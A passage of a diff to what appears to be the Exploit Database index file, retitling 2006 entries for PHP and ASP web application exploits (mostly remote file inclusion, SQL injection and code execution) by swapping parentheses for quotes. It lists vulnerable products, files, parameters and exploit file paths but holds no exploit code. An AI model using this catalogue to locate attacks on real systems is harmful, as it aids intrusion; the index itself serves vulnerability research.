2505,platforms/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 -2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 +2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2508,platforms/php/webapps/2508.txt,"vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0 -2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - (photo_comment.php) File Inclusion",2006-10-10,Kacper,php,webapps,0 -2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - (import.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - (grid3.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -2512,platforms/php/webapps/2512.txt,"Jinzora 2.1 - (media.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -2513,platforms/php/webapps/2513.txt,"ae2 - (standart.inc.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 -2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 -2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 +2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,php,webapps,0 +2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2512,platforms/php/webapps/2512.txt,"Jinzora 2.1 - 'media.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2513,platforms/php/webapps/2513.txt,"ae2 - 'standart.inc.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 +2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - 'naboard_pnr.php' Remote File Inclusion",2006-10-11,mdx,php,webapps,0 +2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - 'import-archive.php' File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 +2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - 'phpBB.inc.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Parameter Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 -2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 +2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 @@ -16793,35 +16796,35 @@ id,file,description,date,author,platform,type,port 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion",2006-10-12,r0ut3r,php,webapps,0 -2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - (menu.inc.php) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 +2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - 'menu.inc.php' File Inclusion",2006-10-13,k1tk4t,php,webapps,0 2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 -2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - (genepi.php) Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 -2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Inclusion",2006-10-13,Drago84,php,webapps,0 +2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - 'bb_usage_stats.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - 'constants.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - 'genepi.php' Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 +2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,php,webapps,0 2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - 'lat2cyr.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - File Inclusion",2006-10-13,bd0rk,php,webapps,0 -2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 +2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 -2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - (settings.php) Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 -2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - (extras/mt.php) Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 -2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - (forum/track.php) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 +2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 +2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - 'forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 -2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - (process.php) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - 'process.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0 2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 -2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0 +2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,php,webapps,0 2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0 2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 @@ -16830,82 +16833,82 @@ id,file,description,date,author,platform,type,port 2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 -2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - (template.php) Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 +2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,php,webapps,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 -2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution",2006-10-17,Kacper,php,webapps,0 +2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - 'prestart.php' Remote Code Execution",2006-10-17,Kacper,php,webapps,0 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusion",2006-10-17,the_day,php,webapps,0 2588,platforms/php/webapps/2588.txt,"Easynews 4.4.1 - 'admin.php' Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - (renderer) Multiple Remote File Inclusion",2006-10-17,mdx,php,webapps,0 -2590,platforms/php/webapps/2590.txt,"PHPPowerCards 2.10 - (txt.inc.php) Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 -2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - (plugins/main.php) Remote File Inclusion",2006-10-18,MP,php,webapps,0 +2590,platforms/php/webapps/2590.txt,"PHPPowerCards 2.10 - 'txt.inc.php' Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 +2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - 'plugins/main.php' Remote File Inclusion",2006-10-18,MP,php,webapps,0 2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 2593,platforms/php/webapps/2593.php,"PHP-Post 1.01 - 'template' Remote Code Execution",2006-10-18,Kacper,php,webapps,0 -2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - (yapbb_session.php) Remote File Inclusion",2006-10-18,Kacper,php,webapps,0 -2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - (lcUser.php) Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps,0 -2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - (constantes.inc.php) Remote File Inclusion",2006-10-19,Kw3[R]Ln,php,webapps,0 -2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion",2006-10-19,Kacper,php,webapps,0 +2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - 'yapbb_session.php' Remote File Inclusion",2006-10-18,Kacper,php,webapps,0 +2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - 'lcUser.php' Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps,0 +2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - 'constantes.inc.php' Remote File Inclusion",2006-10-19,Kw3[R]Ln,php,webapps,0 +2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - 'explorer_load_lang.php' Local File Inclusion",2006-10-19,Kacper,php,webapps,0 2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps,0 -2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0 -2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0 +2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - 'admin_module.php' Remote File Inclusion",2006-10-20,MP,php,webapps,0 +2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - 'quiz.php' SQL Injection",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 -2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - (lib/rs.php) Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 +2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - 'lib/rs.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 2607,platforms/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0 2608,platforms/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 -2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 +2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - 'DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusion",2006-10-23,020,php,webapps,0 2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusion",2006-10-23,GregStar,php,webapps,0 -2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - (database.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 +2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion",2006-10-23,"the master",php,webapps,0 2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 -2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - (include/JawsDB.php) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 -2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 -2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0 +2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - 'include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 +2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - 'includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 +2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - 'embedded.php' File Inclusion",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 -2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 +2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - 'login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 +2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - 'publish.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2647,platforms/php/webapps/2647.php,"Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion",2006-10-25,Kacper,php,webapps,0 2648,platforms/php/webapps/2648.txt,"CommentIT - (PathToComment) Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 -2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 +2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - 'end.php footfile' Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,php,webapps,0 2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 -2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - (classement.php) SQL Injection",2006-10-27,ajann,asp,webapps,0 +2661,platforms/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,asp,webapps,0 2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",asp,webapps,0 2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 -2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - (viewticket.php) Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 +2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 -2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 +2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - 'Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 -2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion",2006-10-28,ajann,php,webapps,0 -2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 -2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Inclusion",2006-10-28,Kacper,php,webapps,0 +2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - 'pcltar.lib.php' Remote File Inclusion",2006-10-28,ajann,php,webapps,0 +2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,php,webapps,0 +2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,php,webapps,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - 'common.php' File Inclusion",2006-10-29,"Mehmet Ince",php,webapps,0 -2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion",2006-10-29,Kacper,php,webapps,0 +2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - 'init_mysource.php' Remote File Inclusion",2006-10-29,Kacper,php,webapps,0 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - 'index.php' SQL Injection",2006-10-29,ajann,php,webapps,0 2677,platforms/php/webapps/2677.asp,"Netref 4 - 'cat_for_aff.php' Source Code Disclosure",2006-10-29,ajann,php,webapps,0 -2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 -2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 +2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 +2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,php,webapps,0 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 @@ -16915,14 +16918,14 @@ id,file,description,date,author,platform,type,port 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 -2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - (themes/fin.php) Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 -2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - (logout.php) SQL Injection",2006-10-31,Kacper,php,webapps,0 +2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - 'themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 +2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 -2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - (acp.php) Remote Code Execution",2006-11-01,Kacper,php,webapps,0 +2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - 'admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 -2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - (classes/index.php) Local File Inclusion",2006-11-02,Kacper,php,webapps,0 -2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 +2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - 'classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps,0 +2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 